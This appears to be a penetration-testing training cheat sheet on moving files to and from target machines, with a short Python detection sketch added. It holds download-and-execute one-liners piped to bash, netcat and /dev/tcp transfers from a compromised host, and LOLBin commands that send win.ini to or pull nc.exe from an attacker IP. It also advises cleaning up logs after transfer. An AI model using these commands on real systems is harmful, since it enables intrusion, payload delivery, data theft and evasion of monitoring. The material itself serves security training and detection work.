Programming Language Methods
Python
# Python 2 Download
python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")'
# Python 3 Download
python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")'
# Python 3 Upload (requires requests)
python3 -c 'import requests; requests.post("http://<IP>:<PORT>/upload", files={"files": open("/path/to/file", "rb")})'
PHP
# Download with file_get_contents
php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);'
# Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
# Download and Execute
php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Ruby and Perl
# Ruby Download
ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))'
# Perl Download
perl -e 'use LWP::Simple; getstore("URL", "output_file");'
Windows Scripting Methods
JavaScript (wget.js)
// Usage: cscript.exe /nologo wget.js <URL> <output_file>
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false); // synchronous GET of the URL argument
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // 1 = adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1)); // write the response body to the output path
Execute with: cscript.exe /nologo wget.js URL output_file
VBScript (wget.vbs)
' Usage: cscript.exe /nologo wget.vbs <URL> <output_file>
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
    .type = 1 ' 1 = adTypeBinary
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2 ' 2 = overwrite an existing file
end with
Execute with: cscript.exe /nologo wget.vbs URL output_file
Netcat and Network Transfer Methods
Basic Netcat Transfer
# Receiver (Listening Mode)
nc -l -p 8000 > file_name.exe
# Sender
nc -q 0 target_IP 8000 < file_name.exe
Ncat with Enhanced Features
# Receiver
ncat -l -p 8000 --recv-only > file_name.exe
# Sender
ncat --send-only target_IP 8000 < file_name.exe
Alternative Methods
# Listen on Attack Host
sudo nc -l -p 443 -q 0 < file_name.exe
# Connect from Compromised Machine
nc attack_IP 443 > file_name.exe
# Using /dev/tcp (No Netcat)
cat < /dev/tcp/attack_IP/443 > file_name.exe
PowerShell Session File Transfer
WinRM Setup and Transfer
# Test Connection
Test-NetConnection -ComputerName target_name -Port 5985
# Create Session
$Session = New-PSSession -ComputerName target_name
# Transfer Files
Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\
Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session
Protected File Transfers
Windows Encryption
# Invoke-AESEncryption is not a built-in cmdlet; import the script that defines it first
# Encrypt String
Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data"
# Decrypt String
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "<Encrypted_String>"
# Encrypt File
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin
# Decrypt File
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes
Linux Encryption
# Encrypt File
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
# Decrypt File
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd
HTTP/S File Upload Server
Nginx Upload Server Setup
# Create Upload Directory
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
# Nginx Configuration (/etc/nginx/sites-available/upload.conf)
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}
# Enable Configuration
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service
# Test Upload
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
Living off The Land (LOLBins/GTFOBins)
Windows LOLBins Examples
# CertReq Upload
certreq.exe -Post -config http://<attack_IP>:8000/ C:\Windows\win.ini
# Bitsadmin Download
bitsadmin /transfer myJobName /priority foreground http://<attack_IP>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
# Certutil Download
certutil.exe -verifyctl -split -f http://<attack_IP>:8000/nc.exe
# PowerShell BITS
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<attack_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
Linux GTFOBins Examples
# OpenSSL Transfer
# On Attack Host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
# On Target
openssl s_client -connect <attack_IP>:80 -quiet > LinEnum.sh
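For the detection side, the sketch below flags the command-line shapes of the LOLBin/GTFOBin transfers listed above, plus the cscript and /dev/tcp one-liners from earlier sections, in process-creation events. It is an added example, not part of the original page; the rule names, host names and sample events are constructed, and the patterns are a triage signal rather than a complete ruleset.

```python
import re

# Rule names are hypothetical. Each pattern targets the command-line shape of
# one transfer method listed on this page, as seen in process-creation logs.
RULES = {
    "certreq_post": r"\bcertreq(\.exe)?\b.*\s-post\b.*https?://",
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://",
    "certutil_verifyctl_url": r"\bcertutil(\.exe)?\b.*-verifyctl\b.*https?://",
    "start_bitstransfer_url": r"\bstart-bitstransfer\b.*-source\s+\S*https?://",
    "cscript_script_with_url": r"\bcscript(\.exe)?\b.*\.(js|vbs)\b.*https?://",
    # s_client is also used for routine TLS debugging, so require -quiet too.
    "openssl_s_client_quiet": r"\bopenssl\s+s_client\b(?=.*-connect\b)(?=.*-quiet\b)",
    "bash_dev_tcp": r"/dev/tcp/[^/\s]+/\d+",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

# Constructed sample events (host, command line); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ("ws01", r"certreq.exe -Post -config http://203.0.113.10:8000/ C:\Windows\win.ini"),
    ("ws01", r"certutil.exe -verifyctl -split -f http://203.0.113.10:8000/nc.exe"),
    ("ws01", r"certutil.exe -hashfile C:\Temp\report.pdf SHA256"),
    ("ws02", r"bitsadmin /transfer myJobName /priority foreground http://203.0.113.10:8000/nc.exe C:\Temp\nc.exe"),
    ("ws02", r"powershell.exe -c Start-BitsTransfer -Source 'http://203.0.113.10:8000/nc.exe' -Destination C:\Windows\Temp\nc.exe"),
    ("ws03", r"cscript.exe /nologo wget.js http://203.0.113.10:8000/nc.exe nc.exe"),
    ("web1", "openssl s_client -connect 203.0.113.10:80 -quiet"),
    ("web1", "openssl s_client -connect example.com:443 -servername example.com"),
    ("web1", "bash -c 'cat < /dev/tcp/203.0.113.10/443 > file_name.exe'"),
]

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))

def triage(events):
    """Keep only events with at least one hit, as (host, hits, cmdline)."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((host, hits, cmdline))
    return findings

if __name__ == "__main__":
    for host, hits, cmdline in triage(SAMPLE_EVENTS):
        print(f"{host}: {','.join(hits)} <- {cmdline}")
```

The two benign samples (`certutil -hashfile` and an `openssl s_client` call without `-quiet`) are deliberately left unflagged to show where the patterns draw the line.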
Best Practices
Security Considerations
Always encrypt sensitive data before transfer
Use secure protocols when available (HTTPS, SFTP, SSH)
Clean up files and logs after transfer
Protocol Selection
Consider firewall restrictions
Use commonly allowed protocols (HTTP/HTTPS)
Have multiple methods ready as backup
Authentication and Access
Use strong, unique passwords for encrypted transfers
Remove temporary access after transfer completion
Monitor for security alerts during transfer
Testing and Verification
Verify file integrity after transfer
Test transfer methods in lab environment first
Document successful methods for future reference